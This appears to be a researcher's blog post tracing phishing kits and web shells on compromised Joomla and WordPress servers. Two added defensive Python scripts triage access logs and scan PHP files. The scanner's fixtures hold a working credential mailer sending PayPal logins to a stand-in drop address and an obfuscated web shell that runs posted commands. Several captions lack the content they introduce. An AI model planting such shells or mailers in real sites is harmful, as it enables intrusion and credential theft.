The first site is gtmaustralia.com.au, with phishing mirrors:
Targeting PayPal; the compromised server runs Joomla 1.5.20 Stable Release [18-July-2010].
The hacker used a phishing redirector, hosted on another compromised server running WordPress:
VirusTotal detection: 0/46 - 3/34
Several backdoors were found:
And a WSO shell with obfuscated code to evade antivirus.
On the server side, resend.php sends the phished data to the hacker:
The server was also used to target EDF (Électricité de France).
Data is again sent via e-mail, by sniper.php:
Cielo is targeted too (VT 5/46):
And also Banco do Brasil (VT 0/46):
That is a lot of phishes for just one server, and it is not over: the server was also used for spam:
Now, looking at the access logs, I suspect 18.104.22.168:
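Picking the operator's address out of a webroot's access log is mostly a matter of separating the IPs that touched the backdoors from the victims who only posted the phishing form. The script below is an added example, not part of the original post: it parses Apache/nginx "combined" log lines and counts, per client IP, requests to the shell paths, POSTs to kit scripts and downloads of kit archives. The log lines, the IPs and the shell path /images/stories/wso.php are constructed for the example; substitute the paths you actually found on the box.

```python
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" log format. The referer/user-agent groups are optional,
# so plain "common" format lines parse as well.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Backdoor locations recovered from the file-system triage (hypothetical path).
SHELL_PATHS = {"/images/stories/wso.php"}

# Constructed sample log: one phished user, one operator, one crawler.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Feb/2013:20:58:11 +0100] "GET /paypal/index.htm HTTP/1.1" 200 8831 "-" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.7 - - [10/Feb/2013:20:58:40 +0100] "POST /paypal/resend.php HTTP/1.1" 302 0 "http://gtmaustralia.com.au/paypal/index.htm" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.42 - - [10/Feb/2013:21:14:02 +0100] "GET /images/stories/wso.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.42 - - [10/Feb/2013:21:14:30 +0100] "POST /images/stories/wso.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.42 - - [10/Feb/2013:21:15:05 +0100] "GET /paypal.zip HTTP/1.1" 200 318220 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2013:21:20:00 +0100] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; crawler)"
""".splitlines()


def triage(lines, shell_paths=SHELL_PATHS):
    """Count, per client IP, the request types that matter when reconstructing the compromise."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line (truncated, or a different log format)
        ip, method, path = m["ip"], m["method"], m["path"].split("?", 1)[0]
        if path in shell_paths:
            hits[ip]["shell"] += 1        # direct use of a backdoor
        elif method == "POST" and path.endswith(".php"):
            hits[ip]["post_php"] += 1     # victims submitting the form, or an uploader being driven
        elif path.endswith((".zip", ".rar", ".tar.gz")):
            hits[ip]["archive"] += 1      # kit archives left next to the pages are fetched by the operator
        else:
            hits[ip]["other"] += 1
    return hits


def suspects(hits):
    """IPs that used a backdoor directly, most active first."""
    return sorted((ip for ip, c in hits.items() if c["shell"]),
                  key=lambda ip: -sum(hits[ip].values()))


def victims(hits):
    """IPs that only posted to kit scripts: phished users, not the operator."""
    return sorted(ip for ip, c in hits.items() if c["post_php"] and not c["shell"])


if __name__ == "__main__":
    h = triage(SAMPLE_LOG)
    for ip in suspects(h):
        print("suspect", ip, dict(h[ip]))
    print("victims", victims(h))
```

Run it against the real log with `triage(open("access.log"))`; the victim list is also what you need for notification, and the operator's user-agent and timestamps (available from the same match objects) are what to correlate across the other compromised hosts.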
Second case (and probably the same guys behind it)
Phishing targeting EDF: http://www.phishtank.com/phish_detail.php?phish_id=1693105
The server is running Joomla here again.
This time, the log files were cleared.
I had posted the previous information, including the log files, on kernelmode. (Did they read me?)
Data is again sent via mail, by index3.php:
And the server is used as a spam relay here again:
The shell found this time was an edited version of Backdoor.PHP.WebShell.BD:
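Both cases so far follow the same pattern: mailer scripts (resend.php, sniper.php, index3.php) that forward form fields to a drop address, plus a web shell whose code was obfuscated or edited so that signature-based antivirus misses it. A file-system triage pass should therefore key on behaviour rather than on strings. The scanner below is an added example, not code from the post or from any of the tools named in it: it tags PHP sources that mail `$_POST` data, that feed `eval()` from a decode chain, or that reach command-execution functions, and it peels `base64_decode`/`gzinflate` layers so that the decoded body is scanned too. The sample files are constructed inline (the obfuscated shell is generated at import time), and `$auth_pass` as a WSO marker is an assumption based on stock WSO builds.

```python
import base64
import re
import zlib


def deflate(data: bytes) -> bytes:
    """Raw DEFLATE, the format PHP's gzinflate() consumes (no zlib/gzip header)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


# --- constructed samples standing in for files recovered from a webroot ---
INNER_PAYLOAD = b"if(isset($_POST['cmd'])){echo shell_exec($_POST['cmd']);}"
OBFUSCATED_SHELL = ("<?php eval(gzinflate(base64_decode('"
                    + base64.b64encode(deflate(INNER_PAYLOAD)).decode() + "'))); ?>")

SAMPLE_FILES = {
    # the resend.php / sniper.php / index3.php pattern: form fields mailed to a drop address
    "resend.php": """<?php
$msg = "Email: ".$_POST['login_email']."\\nPass: ".$_POST['login_password'];
mail("drop@example.com", "PayPal result", $msg);
header("Location: https://www.paypal.com/");
?>""",
    "wso.php": OBFUSCATED_SHELL,
    "index.php": "<?php echo '<h1>Welcome</h1>'; include 'footer.php'; ?>",
    # legitimate mail() use: no attacker-controlled form data involved
    "cron.php": "<?php mail($admin_addr, 'nightly job', 'done'); ?>",
}

EXEC_RE = re.compile(r"\b(shell_exec|system|passthru|exec|proc_open|popen)\s*\(")
OBF_RE = re.compile(r"eval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(")
B64_LITERAL_RE = re.compile(
    r"(gzinflate\s*\(\s*)?base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def peel(src):
    """Decode each base64_decode('...') literal (optionally inside gzinflate) into plaintext layers."""
    layers = []
    for m in B64_LITERAL_RE.finditer(src):
        try:
            data = base64.b64decode(re.sub(r"\s", "", m.group(2)), validate=True)
            if m.group(1):                      # wrapped in gzinflate(): raw deflate
                data = zlib.decompress(data, -15)
            layers.append(data.decode("latin-1"))
        except (ValueError, zlib.error):
            continue                            # not a real payload, skip it
    return layers


def scan_source(src, depth=0):
    """Return the set of behaviour tags for one PHP source, recursing into decoded layers."""
    tags = set()
    if "mail(" in src and "$_POST" in src:
        tags.add("mailer")          # phishing-kit result mailer
    if OBF_RE.search(src):
        tags.add("obfuscated")      # eval() fed from a decode chain
    if EXEC_RE.search(src):
        tags.add("exec")            # command execution primitive
    if "$auth_pass" in src:
        tags.add("wso_marker")      # login-hash variable of stock WSO builds (assumption)
    if depth < 5:                   # bounded: nested layers are common, infinite ones are not
        for layer in peel(src):
            tags |= scan_source(layer, depth + 1)
    return tags


def scan_tree(files):
    """Map file name -> sorted tags, for a {name: source} dict such as one built from os.walk()."""
    return {name: sorted(scan_source(src)) for name, src in files.items()}


if __name__ == "__main__":
    for name, tags in scan_tree(SAMPLE_FILES).items():
        print(f"{name:12} {', '.join(tags) or '-'}")
```

The benign cron.php shows why the mailer rule requires both `mail(` and `$_POST`; a rule on `mail(` alone would flag half of any CMS. Because the edited Backdoor.PHP.WebShell.BD variant was changed precisely to dodge string signatures, the `exec` and `obfuscated` tags, which come from what the code does after decoding, are the ones to trust.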
In a similar case I wrote a tool to retrieve phishing URLs from rotators:
The server was saturated later:
They create different directories with phishing pages to evade antivirus:
The last case was a PayPal phishing page found by markusg, targeting German users.
The server is running WordPress.
Not the same guys, and not the same technique.
This time, the data is sent to a MySQL database on another compromised server:
'ccs' makes me think of 'Credit Card Sell'.
On the server where the data is sent, the hacker uses a parser for credit cards.
The collected data is probably used to supply carding shops.
You can find more research, dumped phishing pages, spam tools and additional files here, including the mail source, and the dumped backdoors here.
Also interesting: Unixfreakjp has written a post about the connection between backdoors and exploit kits here.